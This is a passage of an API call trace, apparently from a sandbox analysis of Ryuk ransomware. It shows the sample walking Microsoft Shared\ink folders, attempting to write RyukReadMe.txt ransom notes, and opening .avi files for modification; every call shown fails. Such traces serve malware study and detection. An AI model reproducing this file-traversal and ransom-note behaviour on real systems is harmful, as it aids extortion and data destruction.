GetLastError () returned 0x5 [0131.563] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.563] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.563] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.563] SetLastError (dwErrCode=0x0) [0131.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.563] GetLastError () returned 0x5 [0131.564] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.564] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.564] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.564] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.564] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.564] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.564] SetLastError (dwErrCode=0x0) [0131.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.564] GetLastError () returned 0x5 [0131.564] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.564] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.564] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.564] SetLastError (dwErrCode=0x0) [0131.564] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.564] GetLastError () returned 0x5 [0131.564] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.565] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.565] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.566] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.566] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.566] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.566] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi", dwFileAttributes=0x80) returned 0 [0131.567] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.567] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.567] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.567] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.567] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.567] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi", dwFileAttributes=0x80) returned 0 [0131.568] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.568] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.568] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.568] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.568] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.569] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi", dwFileAttributes=0x80) returned 0 [0131.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.569] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.569] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.569] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.569] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi", dwFileAttributes=0x80) returned 0 [0131.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.570] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.570] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.570] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi", dwFileAttributes=0x80) returned 0 [0131.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.570] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.570] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.571] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.571] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.571] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi", dwFileAttributes=0x80) returned 0 [0131.571] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.572] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", dwFileAttributes=0x80) returned 0 [0131.572] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.572] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.572] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.572] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", dwFileAttributes=0x80) returned 0 [0131.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.573] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.573] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.573] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.573] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.574] SetLastError (dwErrCode=0x0) [0131.574] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.576] GetLastError () returned 0x5 [0131.576] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.577] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.577] SetLastError (dwErrCode=0x0) [0131.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.577] GetLastError () returned 0x5 [0131.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.577] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.577] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.577] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.577] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.577] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.577] SetLastError (dwErrCode=0x0) [0131.577] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.577] GetLastError () returned 0x5 [0131.577] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.578] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.578] SetLastError (dwErrCode=0x0) [0131.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.578] GetLastError () returned 0x5 [0131.578] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.578] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.579] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.579] SetLastError (dwErrCode=0x0) [0131.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.579] GetLastError () returned 0x5 [0131.579] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.579] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.579] SetLastError (dwErrCode=0x0) [0131.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.579] GetLastError () returned 0x5 [0131.579] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.579] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.579] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.580] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.580] SetLastError (dwErrCode=0x0) [0131.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.580] GetLastError () returned 0x5 [0131.580] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", dwFileAttributes=0x80) returned 0 [0131.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.580] SetLastError (dwErrCode=0x0) [0131.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.581] GetLastError () returned 0x5 [0131.581] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.581] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.581] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.581] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.581] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.581] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.581] SetLastError (dwErrCode=0x0) [0131.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.581] GetLastError () returned 0x5 [0131.581] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.581] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.581] SetLastError (dwErrCode=0x0) [0131.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.581] GetLastError () returned 0x5 [0131.582] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.582] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.583] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.583] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.583] SetLastError (dwErrCode=0x0) [0131.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.583] GetLastError () returned 0x5 [0131.583] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.583] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.584] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.584] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.584] VirtualAlloc 